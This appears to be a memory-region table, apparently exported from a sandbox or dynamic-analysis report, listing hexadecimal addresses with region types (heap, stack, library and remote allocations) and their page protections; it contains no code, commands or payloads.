1D52F43A000
|
heap
|
page read and write
|
||
27D75810000
|
heap
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
27D1061C000
|
trusted library allocation
|
page read and write
|
||
1D52F330000
|
heap
|
page read and write
|
||
1FFE3F0D000
|
heap
|
page read and write
|
||
27D7596C000
|
heap
|
page read and write
|
||
2008FC70000
|
heap
|
page read and write
|
||
7FFAAC421000
|
trusted library allocation
|
page read and write
|
||
1D52D466000
|
heap
|
page read and write
|
||
1FFE5DA4000
|
trusted library allocation
|
page read and write
|
||
10AD000
|
trusted library allocation
|
page execute and read and write
|
||
9A501FF000
|
stack
|
page read and write
|
||
2AC0000
|
heap
|
page execute and read and write
|
||
1FFE618A000
|
trusted library allocation
|
page read and write
|
||
7DF47FD80000
|
trusted library allocation
|
page execute and read and write
|
||
1C6D633A000
|
heap
|
page read and write
|
||
1D52F355000
|
heap
|
page read and write
|
||
2A9E000
|
trusted library allocation
|
page read and write
|
||
27D0171F000
|
trusted library allocation
|
page read and write
|
||
1C6D6343000
|
heap
|
page read and write
|
||
1D52F639000
|
heap
|
page read and write
|
||
1D52EE83000
|
heap
|
page read and write
|
||
1C6D43F0000
|
heap
|
page read and write
|
||
1C6D4420000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
73D00000
|
unkown
|
page readonly
|
||
7FFAAC460000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC32C000
|
trusted library allocation
|
page execute and read and write
|
||
20091B94000
|
heap
|
page read and write
|
||
20091B97000
|
heap
|
page read and write
|
||
52F0000
|
heap
|
page read and write
|
||
1D52F7C1000
|
heap
|
page read and write
|
||
1D52F346000
|
heap
|
page read and write
|
||
1D52F634000
|
heap
|
page read and write
|
||
20091B7B000
|
heap
|
page read and write
|
||
1D52F437000
|
heap
|
page read and write
|
||
1D52EE96000
|
heap
|
page read and write
|
||
1D52D4C9000
|
heap
|
page read and write
|
||
7FFAAC270000
|
trusted library allocation
|
page read and write
|
||
1D52F69A000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52D4C8000
|
heap
|
page read and write
|
||
27D73768000
|
heap
|
page read and write
|
||
1D52D4C3000
|
heap
|
page read and write
|
||
27D0122A000
|
trusted library allocation
|
page read and write
|
||
1D52EEBC000
|
heap
|
page read and write
|
||
20093A40000
|
trusted library allocation
|
page read and write
|
||
1FFFDE10000
|
heap
|
page execute and read and write
|
||
1D52F646000
|
heap
|
page read and write
|
||
2A8E000
|
trusted library allocation
|
page read and write
|
||
1FFFDFC0000
|
heap
|
page read and write
|
||
1D52F682000
|
heap
|
page read and write
|
||
20091E91000
|
heap
|
page read and write
|
||
2BE7000
|
trusted library allocation
|
page read and write
|
||
1D52EE5D000
|
heap
|
page read and write
|
||
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
1C6D42F0000
|
heap
|
page read and write
|
||
27D10011000
|
trusted library allocation
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
1C6D631A000
|
heap
|
page read and write
|
||
1D52F7FE000
|
heap
|
page read and write
|
||
58A7000
|
trusted library allocation
|
page read and write
|
||
90B86FF000
|
stack
|
page read and write
|
||
C2D2DFE000
|
stack
|
page read and write
|
||
1D52F65D000
|
heap
|
page read and write
|
||
20091C91000
|
heap
|
page read and write
|
||
10C2000
|
trusted library allocation
|
page read and write
|
||
1D52EE4C000
|
heap
|
page read and write
|
||
AED248D000
|
stack
|
page read and write
|
||
C2D327E000
|
stack
|
page read and write
|
||
622E000
|
stack
|
page read and write
|
||
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
26F65390000
|
heap
|
page read and write
|
||
2970000
|
heap
|
page read and write
|
||
1140000
|
heap
|
page read and write
|
||
1D52EE89000
|
heap
|
page read and write
|
||
27D738A0000
|
heap
|
page readonly
|
||
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
1D52F6BE000
|
heap
|
page read and write
|
||
1C6D634B000
|
heap
|
page read and write
|
||
39728FF000
|
stack
|
page read and write
|
||
20091BA7000
|
heap
|
page read and write
|
||
27D00080000
|
trusted library allocation
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
27D01ACA000
|
trusted library allocation
|
page read and write
|
||
1D52F6B6000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
1FFFE240000
|
heap
|
page read and write
|
||
27D736E0000
|
heap
|
page read and write
|
||
2A7F000
|
stack
|
page read and write
|
||
7F8F0000
|
trusted library allocation
|
page execute and read and write
|
||
1D52F65E000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
27D75742000
|
heap
|
page read and write
|
||
1D52F62D000
|
heap
|
page read and write
|
||
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
1D52EE63000
|
heap
|
page read and write
|
||
1FFE57B0000
|
heap
|
page read and write
|
||
2BCE000
|
trusted library allocation
|
page read and write
|
||
1D52F434000
|
heap
|
page read and write
|
||
7FFB1DE25000
|
unkown
|
page readonly
|
||
20091B70000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
27D7595A000
|
heap
|
page read and write
|
||
1FFFDDE8000
|
heap
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
1C6D6363000
|
heap
|
page read and write
|
||
1D52F7FA000
|
heap
|
page read and write
|
||
1D52F64F000
|
heap
|
page read and write
|
||
AED238E000
|
stack
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
1D52EE4C000
|
heap
|
page read and write
|
||
90B88FF000
|
stack
|
page read and write
|
||
6380000
|
trusted library allocation
|
page read and write
|
||
20091BD8000
|
heap
|
page read and write
|
||
1D52F640000
|
heap
|
page read and write
|
||
1C6D6610000
|
heap
|
page read and write
|
||
C2D3178000
|
stack
|
page read and write
|
||
26F65290000
|
heap
|
page read and write
|
||
27D019D7000
|
trusted library allocation
|
page read and write
|
||
1D52F343000
|
heap
|
page read and write
|
||
1D52D4AE000
|
heap
|
page read and write
|
||
1D52F636000
|
heap
|
page read and write
|
||
564E000
|
stack
|
page read and write
|
||
1D52F644000
|
heap
|
page read and write
|
||
1D52F67D000
|
heap
|
page read and write
|
||
1D52EEC2000
|
heap
|
page read and write
|
||
AED173C000
|
stack
|
page read and write
|
||
1D52F637000
|
heap
|
page read and write
|
||
1FFE3E20000
|
heap
|
page read and write
|
||
27D73950000
|
heap
|
page read and write
|
||
58B0000
|
trusted library allocation
|
page read and write
|
||
1D52F64B000
|
heap
|
page read and write
|
||
1C6D6326000
|
heap
|
page read and write
|
||
27D75490000
|
trusted library allocation
|
page read and write
|
||
27D75670000
|
heap
|
page execute and read and write
|
||
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
1C6D6326000
|
heap
|
page read and write
|
||
2950000
|
trusted library allocation
|
page read and write
|
||
1D52F7C0000
|
heap
|
page read and write
|
||
C2D31F9000
|
stack
|
page read and write
|
||
1C6D6368000
|
heap
|
page read and write
|
||
20091BC0000
|
heap
|
page read and write
|
||
2008FB9C000
|
heap
|
page read and write
|
||
27D735F0000
|
heap
|
page read and write
|
||
27D75995000
|
heap
|
page read and write
|
||
2008FB81000
|
heap
|
page read and write
|
||
1D52F64F000
|
heap
|
page read and write
|
||
1D52F355000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
1D52EEB4000
|
heap
|
page read and write
|
||
1D52D2F0000
|
heap
|
page read and write
|
||
1FFE3E68000
|
heap
|
page read and write
|
||
7FFB23B00000
|
unkown
|
page readonly
|
||
1D52EECF000
|
heap
|
page read and write
|
||
90B87FF000
|
stack
|
page read and write
|
||
1FFE3E6A000
|
heap
|
page read and write
|
||
7FFAAC310000
|
trusted library allocation
|
page read and write
|
||
1D52F64C000
|
heap
|
page read and write
|
||
AED18BE000
|
stack
|
page read and write
|
||
7FFAAC31C000
|
trusted library allocation
|
page execute and read and write
|
||
27D738B0000
|
trusted library allocation
|
page read and write
|
||
27D758F0000
|
heap
|
page read and write
|
||
1C6D62F5000
|
heap
|
page read and write
|
||
1C6D6377000
|
heap
|
page read and write
|
||
50A3000
|
heap
|
page read and write
|
||
CA9000
|
heap
|
page read and write
|
||
1D52F65E000
|
heap
|
page read and write
|
||
52AC000
|
stack
|
page read and write
|
||
27D75677000
|
heap
|
page execute and read and write
|
||
1D52EEB4000
|
heap
|
page read and write
|
||
4AD8000
|
trusted library allocation
|
page read and write
|
||
10A4000
|
trusted library allocation
|
page read and write
|
||
1D52D487000
|
heap
|
page read and write
|
||
27D7372E000
|
heap
|
page read and write
|
||
1FFE3E61000
|
heap
|
page read and write
|
||
7FFAAC412000
|
trusted library allocation
|
page read and write
|
||
20091E90000
|
heap
|
page read and write
|
||
20091BA7000
|
heap
|
page read and write
|
||
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
27D7371F000
|
heap
|
page read and write
|
||
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
1C6D4411000
|
heap
|
page read and write
|
||
1D52EEBA000
|
heap
|
page read and write
|
||
39724FE000
|
stack
|
page read and write
|
||
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
10BD000
|
trusted library allocation
|
page execute and read and write
|
||
AED14FD000
|
stack
|
page read and write
|
||
27D75952000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
5796000
|
heap
|
page read and write
|
||
1D52EE78000
|
heap
|
page read and write
|
||
5890000
|
trusted library allocation
|
page read and write
|
||
1FFE620B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
1C6D6312000
|
heap
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
1D52F7F4000
|
heap
|
page read and write
|
||
7FFAAC263000
|
trusted library allocation
|
page execute and read and write
|
||
73D16000
|
unkown
|
page readonly
|
||
1C6D4505000
|
heap
|
page read and write
|
||
1FFE5DA7000
|
trusted library allocation
|
page read and write
|
||
664ABFE000
|
stack
|
page read and write
|
||
1D52F590000
|
remote allocation
|
page read and write
|
||
1D52EE7A000
|
heap
|
page read and write
|
||
1C6D62F5000
|
heap
|
page read and write
|
||
7FFAAC330000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC326000
|
trusted library allocation
|
page read and write
|
||
1D52F679000
|
heap
|
page read and write
|
||
1D52F659000
|
heap
|
page read and write
|
||
1D52F67F000
|
heap
|
page read and write
|
||
10D7000
|
trusted library allocation
|
page execute and read and write
|
||
1FFE3EAB000
|
heap
|
page read and write
|
||
7FFAAC316000
|
trusted library allocation
|
page read and write
|
||
AED147E000
|
stack
|
page read and write
|
||
1FFE3DB0000
|
heap
|
page read and write
|
||
C2D2FFF000
|
stack
|
page read and write
|
||
1C6D631B000
|
heap
|
page read and write
|
||
AED240E000
|
stack
|
page read and write
|
||
39726FE000
|
stack
|
page read and write
|
||
1C6D441A000
|
heap
|
page read and write
|
||
1D52F654000
|
heap
|
page read and write
|
||
1D52EECB000
|
heap
|
page read and write
|
||
1D52D44E000
|
heap
|
page read and write
|
||
1D52F630000
|
heap
|
page read and write
|
||
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
EC7000
|
heap
|
page read and write
|
||
2008FBB4000
|
heap
|
page read and write
|
||
C2D3078000
|
stack
|
page read and write
|
||
1D52EEC7000
|
heap
|
page read and write
|
||
1FFE3E2B000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
26F65430000
|
heap
|
page read and write
|
||
1C6D632B000
|
heap
|
page read and write
|
||
1D52D4BD000
|
heap
|
page read and write
|
||
57C5000
|
heap
|
page read and write
|
||
3AD9000
|
trusted library allocation
|
page read and write
|
||
1D52F7D1000
|
heap
|
page read and write
|
||
1D52F352000
|
heap
|
page read and write
|
||
1D52D4B0000
|
heap
|
page read and write
|
||
7FFAAC442000
|
trusted library allocation
|
page read and write
|
||
CA6000
|
heap
|
page read and write
|
||
3AF9000
|
trusted library allocation
|
page read and write
|
||
1D52D44D000
|
heap
|
page read and write
|
||
F8B000
|
heap
|
page read and write
|
||
1D52F6BA000
|
heap
|
page read and write
|
||
1C6D4420000
|
heap
|
page read and write
|
||
2930000
|
trusted library allocation
|
page execute and read and write
|
||
20091BA0000
|
heap
|
page read and write
|
||
1D52F804000
|
heap
|
page read and write
|
||
2BE0000
|
trusted library allocation
|
page read and write
|
||
10B0000
|
trusted library allocation
|
page read and write
|
||
1FFFDDDC000
|
heap
|
page read and write
|
||
1D52EE63000
|
heap
|
page read and write
|
||
1D52F654000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52F346000
|
heap
|
page read and write
|
||
1D52F65E000
|
heap
|
page read and write
|
||
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
27D738E0000
|
heap
|
page execute and read and write
|
||
7FFB1DE16000
|
unkown
|
page readonly
|
||
2B05000
|
trusted library allocation
|
page read and write
|
||
1FFE5DB4000
|
trusted library allocation
|
page read and write
|
||
6390000
|
trusted library allocation
|
page execute and read and write
|
||
20091BCC000
|
heap
|
page read and write
|
||
1FFE6199000
|
trusted library allocation
|
page read and write
|
||
1C6D634B000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
1C6D6314000
|
heap
|
page read and write
|
||
20091BC4000
|
heap
|
page read and write
|
||
C2D2D7E000
|
stack
|
page read and write
|
||
1D52F69E000
|
heap
|
page read and write
|
||
20091BFA000
|
heap
|
page read and write
|
||
C2D30F6000
|
stack
|
page read and write
|
||
27D73954000
|
heap
|
page read and write
|
||
1D52F6BE000
|
heap
|
page read and write
|
||
1D52EE89000
|
heap
|
page read and write
|
||
27D10072000
|
trusted library allocation
|
page read and write
|
||
27D00580000
|
trusted library allocation
|
page read and write
|
||
1D52D4D1000
|
heap
|
page read and write
|
||
AED17BE000
|
stack
|
page read and write
|
||
7FFB23B20000
|
unkown
|
page read and write
|
||
2B46000
|
trusted library allocation
|
page read and write
|
||
7FFB1DE20000
|
unkown
|
page read and write
|
||
2BB0000
|
trusted library allocation
|
page read and write
|
||
90B85FE000
|
stack
|
page read and write
|
||
A5A000
|
stack
|
page read and write
|
||
2BC0000
|
trusted library allocation
|
page read and write
|
||
20091B92000
|
heap
|
page read and write
|
||
27D73721000
|
heap
|
page read and write
|
||
27D01415000
|
trusted library allocation
|
page read and write
|
||
1D52F67A000
|
heap
|
page read and write
|
||
20091BE9000
|
heap
|
page read and write
|
||
2A92000
|
trusted library allocation
|
page read and write
|
||
43E000
|
remote allocation
|
page execute and read and write
|
||
1D52D4A8000
|
heap
|
page read and write
|
||
636E000
|
stack
|
page read and write
|
||
1D52F699000
|
heap
|
page read and write
|
||
1D52D420000
|
heap
|
page read and write
|
||
20091BF1000
|
heap
|
page read and write
|
||
1FFE6085000
|
trusted library allocation
|
page read and write
|
||
27D01951000
|
trusted library allocation
|
page read and write
|
||
39729FC000
|
stack
|
page read and write
|
||
1C6D6311000
|
heap
|
page read and write
|
||
1D52F69E000
|
heap
|
page read and write
|
||
1C6D6337000
|
heap
|
page read and write
|
||
1C6D635C000
|
heap
|
page read and write
|
||
20091BE4000
|
heap
|
page read and write
|
||
7FFAAC5FC000
|
trusted library allocation
|
page read and write
|
||
10DB000
|
trusted library allocation
|
page execute and read and write
|
||
6370000
|
trusted library allocation
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52F6AD000
|
heap
|
page read and write
|
||
20091A90000
|
heap
|
page read and write
|
||
1FFE5DB7000
|
trusted library allocation
|
page read and write
|
||
C2D2C7F000
|
stack
|
page read and write
|
||
1D52EE93000
|
heap
|
page read and write
|
||
1D52F628000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
7FFAAC320000
|
trusted library allocation
|
page read and write
|
||
1D52D4A8000
|
heap
|
page read and write
|
||
7FFAAC5E1000
|
trusted library allocation
|
page read and write
|
||
1C6D81C0000
|
trusted library allocation
|
page read and write
|
||
1D52F69A000
|
heap
|
page read and write
|
||
AED250B000
|
stack
|
page read and write
|
||
1FFE60B4000
|
trusted library allocation
|
page read and write
|
||
1D52F663000
|
heap
|
page read and write
|
||
7FFAAC274000
|
trusted library allocation
|
page read and write
|
||
52EE000
|
stack
|
page read and write
|
||
1FFE3D90000
|
heap
|
page read and write
|
||
1D52EE7C000
|
heap
|
page read and write
|
||
1FFE5D01000
|
trusted library allocation
|
page read and write
|
||
1D52F6A5000
|
heap
|
page read and write
|
||
7FFAAC280000
|
trusted library allocation
|
page read and write
|
||
1D52EEC0000
|
heap
|
page read and write
|
||
1D52D465000
|
heap
|
page read and write
|
||
4C6D000
|
stack
|
page read and write
|
||
20091B73000
|
heap
|
page read and write
|
||
1D52EE7F000
|
heap
|
page read and write
|
||
1D52F824000
|
heap
|
page read and write
|
||
1D52D48C000
|
heap
|
page read and write
|
||
1FFE40C0000
|
trusted library allocation
|
page read and write
|
||
1C6D4445000
|
heap
|
page read and write
|
||
1D52F626000
|
heap
|
page read and write
|
||
1FFE5C90000
|
heap
|
page read and write
|
||
1D52EE7F000
|
heap
|
page read and write
|
||
1D52F7D7000
|
heap
|
page read and write
|
||
1D52D4F0000
|
heap
|
page read and write
|
||
1D52F43A000
|
heap
|
page read and write
|
||
7FFAAC27D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC26D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB23B16000
|
unkown
|
page readonly
|
||
27D00430000
|
trusted library allocation
|
page read and write
|
||
20091A30000
|
heap
|
page read and write
|
||
1C6D4419000
|
heap
|
page read and write
|
||
1C6D441A000
|
heap
|
page read and write
|
||
1D52EF07000
|
heap
|
page read and write
|
||
1D52F677000
|
heap
|
page read and write
|
||
1D52F698000
|
heap
|
page read and write
|
||
1D52EE4A000
|
heap
|
page read and write
|
||
1D52EE5D000
|
heap
|
page read and write
|
||
1D52D4C9000
|
heap
|
page read and write
|
||
1D52EE63000
|
heap
|
page read and write
|
||
1C6D441A000
|
heap
|
page read and write
|
||
1D52F650000
|
heap
|
page read and write
|
||
7FFAAC273000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC5E3000
|
trusted library allocation
|
page read and write
|
||
1FFE40D0000
|
heap
|
page read and write
|
||
2A9A000
|
trusted library allocation
|
page read and write
|
||
1C6D633A000
|
heap
|
page read and write
|
||
7FFAAC380000
|
trusted library allocation
|
page execute and read and write
|
||
5798000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
F2B000
|
heap
|
page read and write
|
||
26F65395000
|
heap
|
page read and write
|
||
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
2AA6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC262000
|
trusted library allocation
|
page read and write
|
||
1D52EEB0000
|
heap
|
page read and write
|
||
1D52F65A000
|
heap
|
page read and write
|
||
1D52F682000
|
heap
|
page read and write
|
||
7FFB1DE00000
|
unkown
|
page readonly
|
||
1FFE5760000
|
heap
|
page execute and read and write
|
||
1D52F64B000
|
heap
|
page read and write
|
||
27D73870000
|
trusted library allocation
|
page read and write
|
||
1D52F676000
|
heap
|
page read and write
|
||
1FFE5D40000
|
trusted library allocation
|
page read and write
|
||
20091B91000
|
heap
|
page read and write
|
||
2BBA000
|
trusted library allocation
|
page read and write
|
||
1D52F7D8000
|
heap
|
page read and write
|
||
7FFAAC42A000
|
trusted library allocation
|
page read and write
|
||
1D52F824000
|
heap
|
page read and write
|
||
1D52F62C000
|
heap
|
page read and write
|
||
1FFE60A5000
|
trusted library allocation
|
page read and write
|
||
1D52D452000
|
heap
|
page read and write
|
||
1090000
|
trusted library allocation
|
page read and write
|
||
1D52EEB9000
|
heap
|
page read and write
|
||
7FFAAC41A000
|
trusted library allocation
|
page read and write
|
||
1D52F64D000
|
heap
|
page read and write
|
||
27D75766000
|
heap
|
page read and write
|
||
AED183E000
|
stack
|
page read and write
|
||
1D52EE5D000
|
heap
|
page read and write
|
||
C2D2E7C000
|
stack
|
page read and write
|
||
1FFE5CA1000
|
trusted library allocation
|
page read and write
|
||
3972AFD000
|
stack
|
page read and write
|
||
27D00520000
|
trusted library allocation
|
page read and write
|
||
1D52F636000
|
heap
|
page read and write
|
||
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
2A80000
|
trusted library allocation
|
page read and write
|
||
1C6D633F000
|
heap
|
page read and write
|
||
1C6D6415000
|
heap
|
page read and write
|
||
20091B7B000
|
heap
|
page read and write
|
||
10D2000
|
trusted library allocation
|
page read and write
|
||
20091A91000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
1D52F5F8000
|
heap
|
page read and write
|
||
1D52D421000
|
heap
|
page read and write
|
||
7FFB1DE25000
|
unkown
|
page readonly
|
||
20091BA4000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52D4C8000
|
heap
|
page read and write
|
||
1D52D469000
|
heap
|
page read and write
|
||
27D73956000
|
heap
|
page read and write
|
||
27D0054A000
|
trusted library allocation
|
page read and write
|
||
7FFB1DE20000
|
unkown
|
page read and write
|
||
1FFFDDB7000
|
heap
|
page read and write
|
||
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
1C6D6357000
|
heap
|
page read and write
|
||
27D1000F000
|
trusted library allocation
|
page read and write
|
||
1D52D455000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
1D52D48A000
|
heap
|
page read and write
|
||
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
1FFE5DB0000
|
trusted library allocation
|
page read and write
|
||
C2D347B000
|
stack
|
page read and write
|
||
1D52F6A1000
|
heap
|
page read and write
|
||
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
1FFFDDF0000
|
heap
|
page execute and read and write
|
||
27D75711000
|
heap
|
page read and write
|
||
1D52F65A000
|
heap
|
page read and write
|
||
1C6D4411000
|
heap
|
page read and write
|
||
1D52F69D000
|
heap
|
page read and write
|
||
1D52EE42000
|
heap
|
page read and write
|
||
1D52F695000
|
heap
|
page read and write
|
||
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
1D52EE88000
|
heap
|
page read and write
|
||
27D75978000
|
heap
|
page read and write
|
||
500C000
|
stack
|
page read and write
|
||
1D52F631000
|
heap
|
page read and write
|
||
1D52F64D000
|
heap
|
page read and write
|
||
63A0000
|
trusted library allocation
|
page execute and read and write
|
||
1C6D62F9000
|
heap
|
page read and write
|
||
27D01707000
|
trusted library allocation
|
page read and write
|
||
7FFB1DE25000
|
unkown
|
page readonly
|
||
10D0000
|
trusted library allocation
|
page read and write
|
||
7FFB1DE01000
|
unkown
|
page execute read
|
||
20091BBB000
|
heap
|
page read and write
|
||
1D52F649000
|
heap
|
page read and write
|
||
1D52D450000
|
heap
|
page read and write
|
||
27D01730000
|
trusted library allocation
|
page read and write
|
||
1D52F681000
|
heap
|
page read and write
|
||
1C6D6611000
|
heap
|
page read and write
|
||
1D52F7FB000
|
heap
|
page read and write
|
||
AED193E000
|
stack
|
page read and write
|
||
1C6D4510000
|
heap
|
page read and write
|
||
1FFE61C4000
|
trusted library allocation
|
page read and write
|
||
1D52F633000
|
heap
|
page read and write
|
||
1C6D4439000
|
heap
|
page read and write
|
||
1C6D632F000
|
heap
|
page read and write
|
||
1FFFDDEE000
|
heap
|
page read and write
|
||
10CA000
|
trusted library allocation
|
page execute and read and write
|
||
73D1F000
|
unkown
|
page readonly
|
||
7FFAAC320000
|
trusted library allocation
|
page execute and read and write
|
||
1D52EE46000
|
heap
|
page read and write
|
||
1FFE62E3000
|
trusted library allocation
|
page read and write
|
||
20091BF8000
|
heap
|
page read and write
|
||
1D52D4C3000
|
heap
|
page read and write
|
||
1D52EE60000
|
heap
|
page read and write
|
||
27D01AC6000
|
trusted library allocation
|
page read and write
|
||
1D52D4DB000
|
heap
|
page read and write
|
||
1C6D62E5000
|
heap
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
27D75992000
|
heap
|
page read and write
|
||
1FFFDD9B000
|
heap
|
page read and write
|
||
27D757F0000
|
heap
|
page read and write
|
||
1147000
|
heap
|
page read and write
|
||
10C6000
|
trusted library allocation
|
page execute and read and write
|
||
2008FBA8000
|
heap
|
page read and write
|
||
20091F65000
|
heap
|
page read and write
|
||
1D52EE80000
|
heap
|
page read and write
|
||
1D52EF08000
|
heap
|
page read and write
|
||
20091BCC000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
5300000
|
heap
|
page execute and read and write
|
||
1D52D46C000
|
heap
|
page read and write
|
||
7FFAAC400000
|
trusted library allocation
|
page read and write
|
||
1D52F6A6000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
1D52F5F7000
|
heap
|
page read and write
|
||
EBB000
|
heap
|
page read and write
|
||
27D0197C000
|
trusted library allocation
|
page read and write
|
||
AED19BB000
|
stack
|
page read and write
|
||
F59000
|
heap
|
page read and write
|
||
1C6D6410000
|
heap
|
page read and write
|
||
26F65438000
|
heap
|
page read and write
|
||
1D52F648000
|
heap
|
page read and write
|
||
7FFAAC430000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
AED1578000
|
stack
|
page read and write
|
||
27D0040C000
|
trusted library allocation
|
page read and write
|
||
1D52F665000
|
heap
|
page read and write
|
||
1FFFDEE0000
|
heap
|
page read and write
|
||
1D52EE85000
|
heap
|
page read and write
|
||
1D52EE42000
|
heap
|
page read and write
|
||
1FFF5CB0000
|
trusted library allocation
|
page read and write
|
||
7FFB1DE20000
|
unkown
|
page read and write
|
||
1FFE40D5000
|
heap
|
page read and write
|
||
1C6D4420000
|
heap
|
page read and write
|
||
1FFFDD73000
|
heap
|
page read and write
|
||
1D52F7F3000
|
heap
|
page read and write
|
||
AED0FFE000
|
stack
|
page read and write
|
||
1D52F663000
|
heap
|
page read and write
|
||
506E000
|
stack
|
page read and write
|
||
1D52D4C9000
|
heap
|
page read and write
|
||
1C6D5D60000
|
heap
|
page read and write
|
||
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
1FFFDD77000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52F697000
|
heap
|
page read and write
|
||
1D52F698000
|
heap
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
27D75923000
|
heap
|
page read and write
|
||
1D52F43B000
|
heap
|
page read and write
|
||
C2D29EE000
|
stack
|
page read and write
|
||
2BD2000
|
trusted library allocation
|
page read and write
|
||
1D52F69A000
|
heap
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
27D73766000
|
heap
|
page read and write
|
||
1D52F5C0000
|
heap
|
page read and write
|
||
27D7594B000
|
heap
|
page read and write
|
||
1D52D487000
|
heap
|
page read and write
|
||
10C0000
|
trusted library allocation
|
page read and write
|
||
27D739A0000
|
heap
|
page read and write
|
||
1FFE6070000
|
trusted library allocation
|
page read and write
|
||
27D00223000
|
trusted library allocation
|
page read and write
|
||
1D52D3F0000
|
heap
|
page read and write
|
||
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
1D52EEB9000
|
heap
|
page read and write
|
||
1D52F628000
|
heap
|
page read and write
|
||
1D52F65A000
|
heap
|
page read and write
|
||
1D52D463000
|
heap
|
page read and write
|
||
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
20091BF8000
|
heap
|
page read and write
|
||
1D52F430000
|
heap
|
page read and write
|
||
1D52F352000
|
heap
|
page read and write
|
||
1FFE5CE9000
|
trusted library allocation
|
page read and write
|
||
1C6D6310000
|
heap
|
page read and write
|
||
3AD1000
|
trusted library allocation
|
page read and write
|
||
1D52D4C6000
|
heap
|
page read and write
|
||
1D52EE8B000
|
heap
|
page read and write
|
||
1D52EE7C000
|
heap
|
page read and write
|
||
1D52F65E000
|
heap
|
page read and write
|
||
1C6D4420000
|
heap
|
page read and write
|
||
1D52D490000
|
heap
|
page read and write
|
||
1FFE6094000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
20091BBB000
|
heap
|
page read and write
|
||
1D52F660000
|
heap
|
page read and write
|
||
2008FF50000
|
heap
|
page read and write
|
||
1D52F650000
|
heap
|
page read and write
|
||
2008FB7C000
|
heap
|
page read and write
|
||
1D52EE40000
|
heap
|
page read and write
|
||
27D7591C000
|
heap
|
page read and write
|
||
C2D33FE000
|
stack
|
page read and write
|
||
1D52EEB4000
|
heap
|
page read and write
|
||
1FFE5700000
|
trusted library allocation
|
page read and write
|
||
7FFAAC280000
|
trusted library allocation
|
page read and write
|
||
1C6D6326000
|
heap
|
page read and write
|
||
1D52F7FD000
|
heap
|
page read and write
|
||
1FFE3F1A000
|
heap
|
page read and write
|
||
1D52F5FB000
|
heap
|
page read and write
|
||
27D737E0000
|
heap
|
page read and write
|
||
7FFAAC272000
|
trusted library allocation
|
page read and write
|
||
1D52D4C9000
|
heap
|
page read and write
|
||
1D52EE75000
|
heap
|
page read and write
|
||
26F65530000
|
heap
|
page read and write
|
||
27D00408000
|
trusted library allocation
|
page read and write
|
||
1FFE3E81000
|
heap
|
page read and write
|
||
1FFFDDAB000
|
heap
|
page read and write
|
||
1FFE62DA000
|
trusted library allocation
|
page read and write
|
||
1D52F663000
|
heap
|
page read and write
|
||
1D52EF90000
|
heap
|
page read and write
|
||
1D52D41B000
|
heap
|
page read and write
|
||
7FFB1DE22000
|
unkown
|
page readonly
|
||
7FFAAC411000
|
